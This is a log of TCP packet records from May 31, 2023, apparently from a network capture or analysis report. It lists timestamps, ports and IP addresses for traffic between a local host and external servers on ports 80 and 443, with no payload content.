May 31, 2023 17:08:22.988025904 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:22.988060951 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:22.988099098 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:22.988105059 CEST	49183	80	192.168.2.22	188.114.96.7
May 31, 2023 17:08:22.988131046 CEST	49183	80	192.168.2.22	188.114.96.7
May 31, 2023 17:08:22.988138914 CEST	49183	80	192.168.2.22	188.114.96.7
May 31, 2023 17:08:22.988142014 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:22.988178015 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:22.988184929 CEST	49183	80	192.168.2.22	188.114.96.7
May 31, 2023 17:08:22.988223076 CEST	49183	80	192.168.2.22	188.114.96.7
May 31, 2023 17:08:22.988605976 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:22.988639116 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:22.988662004 CEST	49183	80	192.168.2.22	188.114.96.7
May 31, 2023 17:08:22.988677979 CEST	49183	80	192.168.2.22	188.114.96.7
May 31, 2023 17:08:22.988682985 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:22.988717079 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:22.988723993 CEST	49183	80	192.168.2.22	188.114.96.7
May 31, 2023 17:08:22.988754034 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:22.988760948 CEST	49183	80	192.168.2.22	188.114.96.7
May 31, 2023 17:08:22.988797903 CEST	49183	80	192.168.2.22	188.114.96.7
May 31, 2023 17:08:22.990113974 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:22.990147114 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:22.990183115 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:22.990191936 CEST	49183	80	192.168.2.22	188.114.96.7
May 31, 2023 17:08:22.990215063 CEST	49183	80	192.168.2.22	188.114.96.7
May 31, 2023 17:08:22.990222931 CEST	49183	80	192.168.2.22	188.114.96.7
May 31, 2023 17:08:22.990226984 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:22.990259886 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:22.990269899 CEST	49183	80	192.168.2.22	188.114.96.7
May 31, 2023 17:08:22.990308046 CEST	49183	80	192.168.2.22	188.114.96.7
May 31, 2023 17:08:22.991122007 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:22.991153955 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:22.991185904 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:22.991204023 CEST	49183	80	192.168.2.22	188.114.96.7
May 31, 2023 17:08:22.991221905 CEST	49183	80	192.168.2.22	188.114.96.7
May 31, 2023 17:08:22.991229057 CEST	49183	80	192.168.2.22	188.114.96.7
May 31, 2023 17:08:22.991231918 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:22.991267920 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:22.991275072 CEST	49183	80	192.168.2.22	188.114.96.7
May 31, 2023 17:08:22.991312981 CEST	49183	80	192.168.2.22	188.114.96.7
May 31, 2023 17:08:22.992453098 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:22.992489100 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:22.992520094 CEST	49183	80	192.168.2.22	188.114.96.7
May 31, 2023 17:08:22.992535114 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:22.992537975 CEST	49183	80	192.168.2.22	188.114.96.7
May 31, 2023 17:08:22.992578030 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:22.992583036 CEST	49183	80	192.168.2.22	188.114.96.7
May 31, 2023 17:08:22.992614985 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:22.992624044 CEST	49183	80	192.168.2.22	188.114.96.7
May 31, 2023 17:08:22.992660046 CEST	49183	80	192.168.2.22	188.114.96.7
May 31, 2023 17:08:22.993885040 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:22.993918896 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:22.993957996 CEST	49183	80	192.168.2.22	188.114.96.7
May 31, 2023 17:08:22.993958950 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:22.993990898 CEST	49183	80	192.168.2.22	188.114.96.7
May 31, 2023 17:08:22.993999004 CEST	49183	80	192.168.2.22	188.114.96.7
May 31, 2023 17:08:22.994002104 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:22.994038105 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:22.994045019 CEST	49183	80	192.168.2.22	188.114.96.7
May 31, 2023 17:08:22.994075060 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:22.994082928 CEST	49183	80	192.168.2.22	188.114.96.7
May 31, 2023 17:08:22.994119883 CEST	49183	80	192.168.2.22	188.114.96.7
May 31, 2023 17:08:23.002113104 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:23.002170086 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:23.002223969 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:23.002238035 CEST	49183	80	192.168.2.22	188.114.96.7
May 31, 2023 17:08:23.002274036 CEST	49183	80	192.168.2.22	188.114.96.7
May 31, 2023 17:08:23.002283096 CEST	49183	80	192.168.2.22	188.114.96.7
May 31, 2023 17:08:23.002285004 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:23.002335072 CEST	49183	80	192.168.2.22	188.114.96.7
May 31, 2023 17:08:23.002336979 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:23.002386093 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:23.002388954 CEST	49183	80	192.168.2.22	188.114.96.7
May 31, 2023 17:08:23.002438068 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:23.002441883 CEST	49183	80	192.168.2.22	188.114.96.7
May 31, 2023 17:08:23.002496004 CEST	49183	80	192.168.2.22	188.114.96.7
May 31, 2023 17:08:23.003230095 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:23.003277063 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:23.003302097 CEST	49183	80	192.168.2.22	188.114.96.7
May 31, 2023 17:08:23.003329039 CEST	49183	80	192.168.2.22	188.114.96.7
May 31, 2023 17:08:23.003333092 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:23.003381014 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:23.003386021 CEST	49183	80	192.168.2.22	188.114.96.7
May 31, 2023 17:08:23.003432989 CEST	49183	80	192.168.2.22	188.114.96.7
May 31, 2023 17:08:23.003434896 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:23.003484964 CEST	49183	80	192.168.2.22	188.114.96.7
May 31, 2023 17:08:23.003484964 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:23.003539085 CEST	49183	80	192.168.2.22	188.114.96.7
May 31, 2023 17:08:23.003540039 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:23.003576994 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:23.003593922 CEST	49183	80	192.168.2.22	188.114.96.7
May 31, 2023 17:08:23.003621101 CEST	49183	80	192.168.2.22	188.114.96.7
May 31, 2023 17:08:23.006100893 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:23.006194115 CEST	49183	80	192.168.2.22	188.114.96.7
May 31, 2023 17:08:23.006236076 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:23.006294012 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:23.006299973 CEST	49183	80	192.168.2.22	188.114.96.7
May 31, 2023 17:08:23.006349087 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:23.006356001 CEST	49183	80	192.168.2.22	188.114.96.7
May 31, 2023 17:08:23.006396055 CEST	49183	80	192.168.2.22	188.114.96.7
May 31, 2023 17:08:23.006397009 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:23.006447077 CEST	49183	80	192.168.2.22	188.114.96.7
May 31, 2023 17:08:23.006447077 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:23.006494045 CEST	49183	80	192.168.2.22	188.114.96.7
May 31, 2023 17:08:23.006498098 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:23.006544113 CEST	49183	80	192.168.2.22	188.114.96.7
May 31, 2023 17:08:23.006551981 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:23.006603956 CEST	49183	80	192.168.2.22	188.114.96.7
May 31, 2023 17:08:23.006633997 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:23.006685972 CEST	49183	80	192.168.2.22	188.114.96.7
May 31, 2023 17:08:23.006685019 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:23.006733894 CEST	49183	80	192.168.2.22	188.114.96.7
May 31, 2023 17:08:23.007023096 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:23.007097006 CEST	49183	80	192.168.2.22	188.114.96.7
May 31, 2023 17:08:23.007147074 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:23.007198095 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:23.007198095 CEST	49183	80	192.168.2.22	188.114.96.7
May 31, 2023 17:08:23.007246971 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:23.007261038 CEST	49183	80	192.168.2.22	188.114.96.7
May 31, 2023 17:08:23.007297039 CEST	49183	80	192.168.2.22	188.114.96.7
May 31, 2023 17:08:23.007299900 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:23.007344961 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:23.007356882 CEST	49183	80	192.168.2.22	188.114.96.7
May 31, 2023 17:08:23.007395983 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:23.007400990 CEST	49183	80	192.168.2.22	188.114.96.7
May 31, 2023 17:08:23.007447004 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:23.007452965 CEST	49183	80	192.168.2.22	188.114.96.7
May 31, 2023 17:08:23.007503986 CEST	49183	80	192.168.2.22	188.114.96.7
May 31, 2023 17:08:23.008007050 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:23.008053064 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:23.008084059 CEST	49183	80	192.168.2.22	188.114.96.7
May 31, 2023 17:08:23.008105040 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:23.008143902 CEST	49183	80	192.168.2.22	188.114.96.7
May 31, 2023 17:08:23.008152008 CEST	49183	80	192.168.2.22	188.114.96.7
May 31, 2023 17:08:23.008161068 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:23.008219004 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:23.008220911 CEST	49183	80	192.168.2.22	188.114.96.7
May 31, 2023 17:08:23.008284092 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:23.008294106 CEST	49183	80	192.168.2.22	188.114.96.7
May 31, 2023 17:08:23.008327961 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:23.008339882 CEST	49183	80	192.168.2.22	188.114.96.7
May 31, 2023 17:08:23.008363008 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:23.008382082 CEST	49183	80	192.168.2.22	188.114.96.7
May 31, 2023 17:08:23.008419991 CEST	49183	80	192.168.2.22	188.114.96.7
May 31, 2023 17:08:23.008822918 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:23.008886099 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:23.008896112 CEST	49183	80	192.168.2.22	188.114.96.7
May 31, 2023 17:08:23.008935928 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:23.008936882 CEST	49183	80	192.168.2.22	188.114.96.7
May 31, 2023 17:08:23.008984089 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:23.008985043 CEST	49183	80	192.168.2.22	188.114.96.7
May 31, 2023 17:08:23.009032011 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:23.009032965 CEST	49183	80	192.168.2.22	188.114.96.7
May 31, 2023 17:08:23.009076118 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:23.009080887 CEST	49183	80	192.168.2.22	188.114.96.7
May 31, 2023 17:08:23.009126902 CEST	49183	80	192.168.2.22	188.114.96.7
May 31, 2023 17:08:23.009140015 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:23.009181976 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:23.009198904 CEST	49183	80	192.168.2.22	188.114.96.7
May 31, 2023 17:08:23.009236097 CEST	49183	80	192.168.2.22	188.114.96.7
May 31, 2023 17:08:23.009713888 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:23.009757996 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:23.009783030 CEST	49183	80	192.168.2.22	188.114.96.7
May 31, 2023 17:08:23.009809017 CEST	49183	80	192.168.2.22	188.114.96.7
May 31, 2023 17:08:23.009810925 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:23.009856939 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:23.009860992 CEST	49183	80	192.168.2.22	188.114.96.7
May 31, 2023 17:08:23.009905100 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:23.009906054 CEST	49183	80	192.168.2.22	188.114.96.7
May 31, 2023 17:08:23.009952068 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:23.009952068 CEST	49183	80	192.168.2.22	188.114.96.7
May 31, 2023 17:08:23.009998083 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:23.010011911 CEST	49183	80	192.168.2.22	188.114.96.7
May 31, 2023 17:08:23.010046005 CEST	49183	80	192.168.2.22	188.114.96.7
May 31, 2023 17:08:23.010046959 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:23.010097027 CEST	49183	80	192.168.2.22	188.114.96.7
May 31, 2023 17:08:23.010534048 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:23.010601044 CEST	49183	80	192.168.2.22	188.114.96.7
May 31, 2023 17:08:23.010631084 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:23.010680914 CEST	49183	80	192.168.2.22	188.114.96.7
May 31, 2023 17:08:23.010700941 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:23.010741949 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:23.010754108 CEST	49183	80	192.168.2.22	188.114.96.7
May 31, 2023 17:08:23.010790110 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:23.010795116 CEST	49183	80	192.168.2.22	188.114.96.7
May 31, 2023 17:08:23.010833979 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:23.010848045 CEST	49183	80	192.168.2.22	188.114.96.7
May 31, 2023 17:08:23.010879993 CEST	49183	80	192.168.2.22	188.114.96.7
May 31, 2023 17:08:23.010880947 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:23.010926962 CEST	49183	80	192.168.2.22	188.114.96.7
May 31, 2023 17:08:23.010929108 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:23.011090994 CEST	49183	80	192.168.2.22	188.114.96.7
May 31, 2023 17:08:23.011435032 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:23.011495113 CEST	49183	80	192.168.2.22	188.114.96.7
May 31, 2023 17:08:23.011512995 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:23.011564970 CEST	49183	80	192.168.2.22	188.114.96.7
May 31, 2023 17:08:23.011617899 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:23.011662006 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:23.011671066 CEST	49183	80	192.168.2.22	188.114.96.7
May 31, 2023 17:08:23.011708975 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:23.011713028 CEST	49183	80	192.168.2.22	188.114.96.7
May 31, 2023 17:08:23.011754990 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:23.011758089 CEST	49183	80	192.168.2.22	188.114.96.7
May 31, 2023 17:08:23.011801004 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:23.011807919 CEST	49183	80	192.168.2.22	188.114.96.7
May 31, 2023 17:08:23.011846066 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:23.011852980 CEST	49183	80	192.168.2.22	188.114.96.7
May 31, 2023 17:08:23.011890888 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:23.011897087 CEST	49183	80	192.168.2.22	188.114.96.7
May 31, 2023 17:08:23.011939049 CEST	49183	80	192.168.2.22	188.114.96.7
May 31, 2023 17:08:23.012548923 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:23.012597084 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:23.012610912 CEST	49183	80	192.168.2.22	188.114.96.7
May 31, 2023 17:08:23.012643099 CEST	49183	80	192.168.2.22	188.114.96.7
May 31, 2023 17:08:23.012645006 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:23.012690067 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:23.012691975 CEST	49183	80	192.168.2.22	188.114.96.7
May 31, 2023 17:08:23.012736082 CEST	49183	80	192.168.2.22	188.114.96.7
May 31, 2023 17:08:23.012739897 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:23.012783051 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:23.012789011 CEST	49183	80	192.168.2.22	188.114.96.7
May 31, 2023 17:08:23.012833118 CEST	49183	80	192.168.2.22	188.114.96.7
May 31, 2023 17:08:23.012834072 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:23.012877941 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:23.012883902 CEST	49183	80	192.168.2.22	188.114.96.7
May 31, 2023 17:08:23.012937069 CEST	49183	80	192.168.2.22	188.114.96.7
May 31, 2023 17:08:23.013401031 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:23.013442039 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:23.013465881 CEST	49183	80	192.168.2.22	188.114.96.7
May 31, 2023 17:08:23.013482094 CEST	49183	80	192.168.2.22	188.114.96.7
May 31, 2023 17:08:23.013495922 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:23.013541937 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:23.013542891 CEST	49183	80	192.168.2.22	188.114.96.7
May 31, 2023 17:08:23.013586998 CEST	49183	80	192.168.2.22	188.114.96.7
May 31, 2023 17:08:23.013587952 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:23.013633966 CEST	49183	80	192.168.2.22	188.114.96.7
May 31, 2023 17:08:23.013633966 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:23.013680935 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:23.013683081 CEST	49183	80	192.168.2.22	188.114.96.7
May 31, 2023 17:08:23.013726950 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:23.013730049 CEST	49183	80	192.168.2.22	188.114.96.7
May 31, 2023 17:08:23.013782024 CEST	49183	80	192.168.2.22	188.114.96.7
May 31, 2023 17:08:23.014285088 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:23.014353037 CEST	49183	80	192.168.2.22	188.114.96.7
May 31, 2023 17:08:23.014364004 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:23.014409065 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:23.014411926 CEST	49183	80	192.168.2.22	188.114.96.7
May 31, 2023 17:08:23.014456034 CEST	49183	80	192.168.2.22	188.114.96.7
May 31, 2023 17:08:23.014456987 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:23.014503002 CEST	49183	80	192.168.2.22	188.114.96.7
May 31, 2023 17:08:23.014504910 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:23.014552116 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:23.014553070 CEST	49183	80	192.168.2.22	188.114.96.7
May 31, 2023 17:08:23.014599085 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:23.014600039 CEST	49183	80	192.168.2.22	188.114.96.7
May 31, 2023 17:08:23.014646053 CEST	49183	80	192.168.2.22	188.114.96.7
May 31, 2023 17:08:23.014647007 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:23.014693975 CEST	49183	80	192.168.2.22	188.114.96.7
May 31, 2023 17:08:23.015173912 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:23.015213966 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:23.015244961 CEST	49183	80	192.168.2.22	188.114.96.7
May 31, 2023 17:08:23.015260935 CEST	49183	80	192.168.2.22	188.114.96.7
May 31, 2023 17:08:23.015268087 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:23.015311956 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:23.015315056 CEST	49183	80	192.168.2.22	188.114.96.7
May 31, 2023 17:08:23.015357971 CEST	49183	80	192.168.2.22	188.114.96.7
May 31, 2023 17:08:23.015360117 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:23.015403986 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:23.015404940 CEST	49183	80	192.168.2.22	188.114.96.7
May 31, 2023 17:08:23.015450001 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:23.015454054 CEST	49183	80	192.168.2.22	188.114.96.7
May 31, 2023 17:08:23.015496969 CEST	49183	80	192.168.2.22	188.114.96.7
May 31, 2023 17:08:23.015496969 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:23.015551090 CEST	49183	80	192.168.2.22	188.114.96.7
May 31, 2023 17:08:23.016048908 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:23.016088009 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:23.016110897 CEST	49183	80	192.168.2.22	188.114.96.7
May 31, 2023 17:08:23.016128063 CEST	49183	80	192.168.2.22	188.114.96.7
May 31, 2023 17:08:23.016141891 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:23.016185999 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:23.016187906 CEST	49183	80	192.168.2.22	188.114.96.7
May 31, 2023 17:08:23.016231060 CEST	49183	80	192.168.2.22	188.114.96.7
May 31, 2023 17:08:23.016233921 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:23.016278982 CEST	49183	80	192.168.2.22	188.114.96.7
May 31, 2023 17:08:23.016304016 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:23.016346931 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:23.016359091 CEST	49183	80	192.168.2.22	188.114.96.7
May 31, 2023 17:08:23.016393900 CEST	49183	80	192.168.2.22	188.114.96.7
May 31, 2023 17:08:23.016396999 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:23.016443968 CEST	49183	80	192.168.2.22	188.114.96.7
May 31, 2023 17:08:23.016901016 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:23.016941071 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:23.016978979 CEST	49183	80	192.168.2.22	188.114.96.7
May 31, 2023 17:08:23.017357111 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:23.017400026 CEST	49183	80	192.168.2.22	188.114.96.7
May 31, 2023 17:08:23.017426014 CEST	49183	80	192.168.2.22	188.114.96.7
May 31, 2023 17:08:23.017457962 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:23.017504930 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:23.017509937 CEST	49183	80	192.168.2.22	188.114.96.7
May 31, 2023 17:08:23.017553091 CEST	49183	80	192.168.2.22	188.114.96.7
May 31, 2023 17:08:23.017554998 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:23.017599106 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:23.017601013 CEST	49183	80	192.168.2.22	188.114.96.7
May 31, 2023 17:08:23.017646074 CEST	49183	80	192.168.2.22	188.114.96.7
May 31, 2023 17:08:23.017647028 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:23.017689943 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:23.017699957 CEST	49183	80	192.168.2.22	188.114.96.7
May 31, 2023 17:08:23.017738104 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:23.017745018 CEST	49183	80	192.168.2.22	188.114.96.7
May 31, 2023 17:08:23.017791033 CEST	49183	80	192.168.2.22	188.114.96.7
May 31, 2023 17:08:23.018259048 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:23.018300056 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:23.018343925 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:23.018345118 CEST	49183	80	192.168.2.22	188.114.96.7
May 31, 2023 17:08:23.018345118 CEST	49183	80	192.168.2.22	188.114.96.7
May 31, 2023 17:08:23.018366098 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:23.018382072 CEST	49183	80	192.168.2.22	188.114.96.7
May 31, 2023 17:08:23.018390894 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:23.018397093 CEST	49183	80	192.168.2.22	188.114.96.7
May 31, 2023 17:08:23.018414021 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:23.018426895 CEST	49183	80	192.168.2.22	188.114.96.7
May 31, 2023 17:08:23.018439054 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:23.018448114 CEST	49183	80	192.168.2.22	188.114.96.7
May 31, 2023 17:08:23.018460989 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:23.018475056 CEST	49183	80	192.168.2.22	188.114.96.7
May 31, 2023 17:08:23.018491983 CEST	49183	80	192.168.2.22	188.114.96.7
May 31, 2023 17:08:23.019022942 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:23.019088030 CEST	49183	80	192.168.2.22	188.114.96.7
May 31, 2023 17:08:30.375180006 CEST	49188	443	192.168.2.22	142.250.203.109
May 31, 2023 17:08:30.375216007 CEST	443	49188	142.250.203.109	192.168.2.22
May 31, 2023 17:08:30.375262976 CEST	49188	443	192.168.2.22	142.250.203.109
May 31, 2023 17:08:30.376121998 CEST	49188	443	192.168.2.22	142.250.203.109
May 31, 2023 17:08:30.376141071 CEST	443	49188	142.250.203.109	192.168.2.22
May 31, 2023 17:08:30.377820015 CEST	49189	443	192.168.2.22	142.250.203.110
May 31, 2023 17:08:30.377860069 CEST	443	49189	142.250.203.110	192.168.2.22
May 31, 2023 17:08:30.377914906 CEST	49189	443	192.168.2.22	142.250.203.110
May 31, 2023 17:08:30.378245115 CEST	49189	443	192.168.2.22	142.250.203.110
May 31, 2023 17:08:30.378266096 CEST	443	49189	142.250.203.110	192.168.2.22
May 31, 2023 17:08:30.429897070 CEST	443	49188	142.250.203.109	192.168.2.22
May 31, 2023 17:08:30.430294037 CEST	49188	443	192.168.2.22	142.250.203.109
May 31, 2023 17:08:30.430336952 CEST	443	49188	142.250.203.109	192.168.2.22
May 31, 2023 17:08:30.432118893 CEST	443	49189	142.250.203.110	192.168.2.22
May 31, 2023 17:08:30.432571888 CEST	49189	443	192.168.2.22	142.250.203.110
May 31, 2023 17:08:30.432610989 CEST	443	49189	142.250.203.110	192.168.2.22
May 31, 2023 17:08:30.432777882 CEST	443	49188	142.250.203.109	192.168.2.22
May 31, 2023 17:08:30.432862043 CEST	49188	443	192.168.2.22	142.250.203.109
May 31, 2023 17:08:30.433170080 CEST	443	49189	142.250.203.110	192.168.2.22
May 31, 2023 17:08:30.433264971 CEST	49189	443	192.168.2.22	142.250.203.110
